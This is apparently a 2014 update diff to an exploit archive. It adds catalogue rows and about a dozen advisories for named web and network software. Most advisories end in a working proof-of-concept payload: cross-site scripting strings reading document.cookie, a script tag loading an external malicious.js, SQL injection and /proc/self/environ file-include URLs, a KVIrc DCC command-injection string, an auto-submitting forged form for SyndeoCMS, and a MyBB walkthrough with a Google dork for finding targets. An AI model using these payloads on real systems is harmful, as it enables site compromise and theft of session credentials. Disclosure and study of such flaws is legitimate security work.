Updated 08_22_2014

files.csv

@@ -30958,3 +30958,16 @@ id,file,description,date,author,platform,type,port
 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0
 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0
 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0
+34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 Cross Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0
+34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0
+34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0
+34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 'standardize()' Buffer Overflow Vulnerability",2010-07-26,"Brendan Boerner",linux,dos,0
+34376,platforms/asp/webapps/34376.txt,"e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0
+34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0
+34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI Cross Site Scripting Vulnerability",2009-12-04,anonymous,php,webapps,0
+34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0
+34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 'searchadvance.asp' Cross Site Scripting Vulnerability",2009-12-22,"Andrea Bocchetti",asp,webapps,0
+34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0
+34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0
+34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 Cross Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0
+34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0

platforms/asp/webapps/34376.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41970/info
+
+e-Courier CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+https://www.example.com/home/index.asp?UserGUID="><script>alert(document.cookie)</script>

platforms/asp/webapps/34380.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41995/info
+
+Active Business Directory is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Active Business Directory 2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/demoactivebusinessdirectory/searchadvance.asp? <= xss 

platforms/jsp/webapps/34384.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42025/info
+
+Jira is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, and execute arbitrary client-side scripts in the context of the browser.
+
+Jira 4.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html,<script>alert(0)</script>
+http://www.example.com/AttachFile!default.jspa?id=[VALID_ID]&returnUrl=javascript:alert(0)';foo='
+

platforms/linux/dos/34375.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41965/info
+
+sSMTP is prone to a remote buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+sSMTP 2.6.2 is vulnerable; other versions may also be affected. 
+
+echo -n . ; for i in {1..2050} ; do echo -n $i ; done 

platforms/linux/remote/34385.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/42026/info
+
+KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application.
+
+KVIrc 4.0.0 is vulnerable; other versions may also be affected. 
+
+/ctcp nickname DCC GET\rQUIT\r
+/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r 

platforms/multiple/remote/34372.txt

@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/41929/info
+
+Twonky Server is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to Twonky Server 4.4.18, 5.0.66, and 5.1 are vulnerable. 
+
+http://www.example.com/twonky:9000/fake_config_page<script type="text/javascript"src="http://www.example.com//malicious.js"; ></script>

platforms/php/webapps/34373.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/41949/info
+
+MC Content Manager is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+Cross site scripting:
+
+1) http://www.example.com/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+2) http://www.example.com/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+3) http://www.example.com/cms/%3Cbody%20onload=alert(document.cookie)%3E/
+
+SQL Injection:
+
+1) http://www.example.com/cms/ua%20where%201=1--%20/ 

platforms/php/webapps/34374.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41961/info
+
+Joomla! FreiChat component is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to FreiChat 2.1.2 are vulnerable. 
+
+<script>alert('hello')</script>

platforms/php/webapps/34377.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41973/info
+
+Portili Personal and Team Wiki are prone to multiple security vulnerabilities. These vulnerabilities include a cross-site scripting vulnerability, an arbitrary-file-upload vulnerability, and multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, upload arbitrary files to the affected computer, and execute arbitrary script code in the context of the browser.
+
+Personal Wiki 1.14 and Team Wiki 1.14 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/ajaxfilemanager/ajaxfilemanager.php?path=../uploads/&view=1<script>alert("abysssec")</script>

platforms/php/webapps/34378.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41986/info
+
+DPI is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+DPI version 1.1f is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E 

platforms/php/webapps/34379.html

@@ -0,0 +1,109 @@
+source: http://www.securityfocus.com/bid/41989/info
+
+SyndeoCMS is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+SyndeoCMS 2.9.0 is vulnerable; prior versions may also be affected. 
+
+<form action="http://www.example.com/starnet/index.php?option=modulemanager&module=3&modoption=saveconfig" method="post" name="main" >
+
+<input type="hidden" name="general[0]" value="1" />
+<input type="hidden" name="general[1]" value="#99FFFF" />
+<input type="hidden" name="general[2]" value="900" />
+<input type="hidden" name="general[3]" value="1" />
+<input type="hidden" name="general[4]" value="#000066" />
+<input type="hidden" name="header[1]" value="header4.php" />
+<input type="hidden" name="header[2]" value="290" />
+<input type="hidden" name="header[3]" value=&#039;starnet/media/header-bg.jpg"><script>alert(document.cookie)</script>&#039; />
+<input type="hidden" name="header[4]" value="Century Schoolbook" />
+<input type="hidden" name="header[5]" value="55" />
+<input type="hidden" name="header[6]" value="#FFFFFF" />
+<input type="hidden" name="header[7]" value="0" />
+<input type="hidden" name="header[0]" value="1" />
+<input type="hidden" name="section[1]" value="section1.php" />
+<input type="hidden" name="section[2]" value="#FF0000" />
+<input type="hidden" name="section[3]" value="#99CC99" />
+<input type="hidden" name="section[4]" value="#0099CC" />
+<input type="hidden" name="section[5]" value="Arial" />
+<input type="hidden" name="section[6]" value="14" />
+<input type="hidden" name="section[7]" value="#FFFFFF" />
+<input type="hidden" name="section[8]" value="100" />
+<input type="hidden" name="section[9]" value="#0099CC" />
+<input type="hidden" name="section[0]" value="1" />
+<input type="hidden" name="status[1]" value="status3.php" />
+<input type="hidden" name="status[2]" value="#FF33FF" />
+<input type="hidden" name="status[3]" value="Arial" />
+<input type="hidden" name="status[4]" value="10" />
+<input type="hidden" name="status[5]" value="#CCFFCC" />
+<input type="hidden" name="status[6]" value="Location:" />
+<input type="hidden" name="status[7]" value="" />
+<input type="hidden" name="status[8]" value="" />
+<input type="hidden" name="status[9]" value="" />
+<input type="hidden" name="status[0]" value="1" />
+<input type="hidden" name="menu[1]" value="menu1.php" />
+<input type="hidden" name="menu[2]" value="#CC66FF" />
+<input type="hidden" name="menu[3]" value="#FF9966" />
+<input type="hidden" name="menu[4]" value="#FF66FF" />
+<input type="hidden" name="menu[5]" value="#CCCC99" />
+<input type="hidden" name="menu[6]" value="Arial" />
+<input type="hidden" name="menu[7]" value="14" />
+<input type="hidden" name="menu[8]" value="#000000" />
+<input type="hidden" name="menu[9]" value="starnet/themes/editable/arrow_blue.gif" />
+<input type="hidden" name="menu[0]" value="1" />
+<input type="hidden" name="content[0]" value="content1.php" />
+<input type="hidden" name="content[1]" value="#FFFFFF" />
+<input type="hidden" name="content[2]" value="#FFFF99" />
+<input type="hidden" name="content[3]" value="630" />
+<input type="hidden" name="content[4]" value="500" />
+<input type="hidden" name="content[5]" value="Arial" />
+<input type="hidden" name="content[6]" value="10" />
+<input type="hidden" name="content[7]" value="#000000" />
+<input type="hidden" name="content[8]" value="1" />
+<input type="hidden" name="footer[1]" value="footer2.php" />
+<input type="hidden" name="footer[2]" value="#003366" />
+<input type="hidden" name="footer[3]" value="Arial" />
+<input type="hidden" name="footer[4]" value="10" />
+<input type="hidden" name="footer[5]" value="#FFFFFF" />
+<input type="hidden" name="footer[6]" value="Page last changed:" />
+<input type="hidden" name="footer[7]" value="25" />
+<input type="hidden" name="footer[0]" value="1" />
+<input type="hidden" name="savebutton" value=" Save" />
+
+
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+
+<form action="http://www.example.com/starnet/index.php?option=modulemanager&module=2&modoption=save_link&suboption=&page_id=3&link_id=2" method="post" name="main" >
+
+<input type="hidden" name="link_category" value="ICT">
+<input type="hidden" name="link_title" value="Google">
+<input type="hidden" name="link_url" value="http://www.google.com">
+<input type="hidden" name="link_description" value=&#039;Search Engine."><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="link_sort" value="1">
+<input type="hidden" name="page_id" value="3">
+<input type="hidden" name="initial" value="1">
+<input type="hidden" name="savebutton" value=" Save" >
+
+
+
+<form action="http://www.example.com/starnet/index.php?option=modulemanager&module=13&modoption=save_message&suboption=&message_id=1&cat_id=4" method="post" name="main" >
+
+<input type="hidden" name="intro_message" value="Holiday">
+<input type="hidden" name="days" value="0">
+<input type="hidden" name="page_id" value="4">
+<input type="hidden" name="name" value="Director">
+<input type="hidden" name="date" value="09-07-2010">
+<input type="hidden" name="message" value=&#039;Next week is a holiday so all the children are free"><script>alert(document.cookie)</script>&#039; >
+<input type="hidden" name="savebutton" value=" Save">
+
+</form>
+<script>
+document.main.submit();
+</script>
+
+

platforms/php/webapps/34381.txt

@@ -0,0 +1,41 @@
+# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
+# Google Dork: intext:"Powered By MyBB"
+# Date: 15.08.2014
+# Author: DemoLisH
+# Vendor Homepage: http://www.mybb.com/
+# Software Link: http://www.mybb.com/downloads
+# Version: 1.8 - Beta 3
+# Contact: onur@b3yaz.org
+***************************************************
+a) Cross Site Scripting in Installation Wizard ( Board Configuration )
+Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
+Now let's finish setup and go to the homepage.
+
+
+b) SQL Injection in Private Messages ( User CP )
+Go to -> Inbox, for example:localhost/private.php
+Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
+
+
+c) SQL Injection in Showthread
+Go to -> Show Thread, for example:localhost/showthread.php?tid=1
+Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
+
+
+d) SQL Injection in Search
+Go to -> Search, for example:localhost/search.php
+Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
+
+
+e) SQL Injection in Help Documents
+Go to -> Help Documents, for example:localhost/misc.php?action=help
+Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
+
+
+f) SQL Injection in Forum Display
+Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
+Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
+
+***************************************************
+[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
+ 		 	   		  

platforms/php/webapps/34383.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42009/info
+
+Social Media is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Social Media 2.0.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?view=../../../../../../../../../../../../../../../proc/self/environ%00